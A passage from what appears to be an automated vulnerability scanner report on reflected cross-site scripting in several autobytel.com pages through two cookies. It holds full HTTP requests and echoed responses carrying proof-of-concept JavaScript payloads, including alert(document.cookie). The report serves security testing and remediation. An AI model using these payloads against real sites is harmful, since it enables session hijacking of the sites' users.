Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4bf94b"%3balert(1)//da95038b8f8; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:49:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:49:09 GMT
Content-Length: 22181
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:49:08 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4bf94b";alert(1)//da95038b8f8";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "484D7627-C7C5-A510-72DE5B68
...[SNIP]...

4.2075. http://www.autobytel.com/diagnose-problem/my-garage.htm [ENTERED_POSTAL_CODE_VCH cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /diagnose-problem/my-garage.htm

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75850"%3balert(1)//c65df28989b was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as 75850";alert(1)//c65df28989b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /diagnose-problem/my-garage.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=75850"%3balert(1)//c65df28989b; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:53:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:53:00 GMT
Content-Length: 22206
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=75850;expires=Wed, 16-Jan-2041 23:53:00 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
s.prop6 = "";
           //s.prop7 = "|";
           
           //s.prop9 = "|Search Engine Optimization Project|13148";
           s.prop10 = "|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "75850";alert(1)//c65df28989b||";
           
           s.prop14 = "my garage page|diagnose-problem : Search Engine Optimization Project entry page";
           s.prop15 = "|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "||||||Sea
...[SNIP]...

4.2076. http://www.autobytel.com/my-garage.htm [BDATALIST cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /my-garage.htm

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0ab7"%3balert(1)//ee2e0060c44 was submitted in the BDATALIST cookie. This input was echoed as b0ab7";alert(1)//ee2e0060c44 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /my-garage.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4b0ab7"%3balert(1)//ee2e0060c44; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:48:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:48:37 GMT
Content-Length: 22059
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:48:37 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4b0ab7";alert(1)//ee2e0060c44";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "4848B300-A6C5-3A65-E14CF5DB
...[SNIP]...

4.2077. http://www.autobytel.com/my-garage.htm [ENTERED_POSTAL_CODE_VCH cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /my-garage.htm

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 645a6"%3balert(1)//14be9289b7 was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as 645a6";alert(1)//14be9289b7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /my-garage.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=645a6"%3balert(1)//14be9289b7; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:52:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:52:22 GMT
Content-Length: 22058
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:52:22 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
s.prop6 = "";
           //s.prop7 = "|";
           
           //s.prop9 = "|Search Engine Optimization Project|13148";
           s.prop10 = "|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "645a6";alert(1)//14be9289b7||";
           
           s.prop14 = "my garage page : Search Engine Optimization Project entry page";
           s.prop15 = "|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "||||||Search Engine Optimi
...[SNIP]...

4.2078. http://www.autobytel.com/new-car-price-quotes.htm [BDATALIST cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /new-car-price-quotes.htm

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0580"%3balert(1)//60c900d953a was submitted in the BDATALIST cookie. This input was echoed as b0580";alert(1)//60c900d953a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /new-car-price-quotes.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4b0580"%3balert(1)//60c900d953a; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:45:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:45:03 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:45:03 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:45:03 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 62687


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4b0580";alert(1)//60c900d953a";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "482804DA-FE90-75BA-D3C3E78F
...[SNIP]...

4.2079. http://www.autobytel.com/new-car-price-quotes.htm [ENTERED_POSTAL_CODE_VCH cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /new-car-price-quotes.htm

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 61058"%3balert(1)//6df31272ede was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as 61058";alert(1)//6df31272ede in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /new-car-price-quotes.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=61058"%3balert(1)//6df31272ede; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:53:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:53:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=61058;expires=Wed, 16-Jan-2041 23:53:54 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: ENTERED_POSTAL_CODE_VCH=61058%22%3Balert%281%29%2F%2F6df31272ede;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:53:54 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 62726


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
           //s.prop7 = "buypr|";
           
           //s.prop9 = "buypr|Search Engine Optimization Project|13148";
           s.prop10 = "buypr|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "61058";alert(1)//6df31272ede||";
           
           s.prop14 = "buy|lm|newcar : Search Engine Optimization Project entry page";
           s.prop15 = "|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "buypr||||sky|ban|Search Eng
...[SNIP]...

4.2080. http://www.autobytel.com/new-cars.htm [BDATALIST cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /new-cars.htm

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19611"%3balert(1)//c01fa74b496 was submitted in the BDATALIST cookie. This input was echoed as 19611";alert(1)//c01fa74b496 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /new-cars.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c419611"%3balert(1)//c01fa74b496; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:43:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:43:50 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:43:50 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:43:50 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 104097


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c419611";alert(1)//c01fa74b496";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "481CC3B8-D7A5-3C72-417DCA9A
...[SNIP]...

4.2081. http://www.autobytel.com/new-cars.htm [ENTERED_POSTAL_CODE_VCH cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /new-cars.htm

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1a58"%3balert(1)//14303cfeb20 was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as f1a58";alert(1)//14303cfeb20 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /new-cars.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=f1a58"%3balert(1)//14303cfeb20; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:50:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:50:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:50:14 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:50:14 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 104097


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
= "research|rhp";
           
           //s.prop9 = "research|Search Engine Optimization Project|13148";
           s.prop10 = "research|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "f1a58";alert(1)//14303cfeb20||";
           
           s.prop14 = "new car home page : Search Engine Optimization Project entry page";
           s.prop15 = "|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "research|||rec|sky|ban|
...[SNIP]...

4.2082. http://www.autobytel.com/repair-cost-calculator/my-garage.htm [BDATALIST cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /repair-cost-calculator/my-garage.htm

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5233e"%3balert(1)//fc738b4235a was submitted in the BDATALIST cookie. This input was echoed as 5233e";alert(1)//fc738b4235a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /repair-cost-calculator/my-garage.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c45233e"%3balert(1)//fc738b4235a; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:52:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:52:30 GMT
Content-Length: 22208
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:52:29 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c45233e";alert(1)//fc738b4235a";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "486C2605-CE30-E673-3995D43B
...[SNIP]...

4.2083. http://www.autobytel.com/repair-cost-calculator/my-garage.htm [ENTERED_POSTAL_CODE_VCH cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /repair-cost-calculator/my-garage.htm

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f76c5"%3balert(1)//f9f2c543b9c was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as f76c5";alert(1)//f9f2c543b9c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /repair-cost-calculator/my-garage.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
